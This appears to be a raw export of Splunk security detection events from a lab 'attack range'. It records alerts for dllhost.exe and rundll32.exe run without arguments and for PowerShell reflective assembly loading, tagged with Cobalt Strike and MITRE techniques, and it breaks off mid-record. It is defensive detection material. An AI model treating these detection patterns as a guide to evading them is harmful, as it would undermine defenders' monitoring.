annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="18328", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xfd0", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5838", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="0x4ce0", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4798", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="0x1694", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805600, search_name="ESCU - Rundll32 with no Command Line Arguments with Network - Rule", C2="10.0.1.15", orig_time="1664805600", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"process_name\", \"role\": [\"Attacker\"], \"type\": \"Process Name\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", dest="exchange01.attackrange.local", dest_port="50867", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="2528", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="A rundll32 process rundll32.exe with no commandline argument like this process commandline C:\\Windows\\System32\\rundll32.exe in host exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="70.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments and performing a network connection. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, triage any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="rundll32.exe", threat_object_type="process name" 1664808932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T13:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T13:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664808932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T13:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T13:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664808932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T13:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T13:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664808932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T13:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T13:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4220", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", 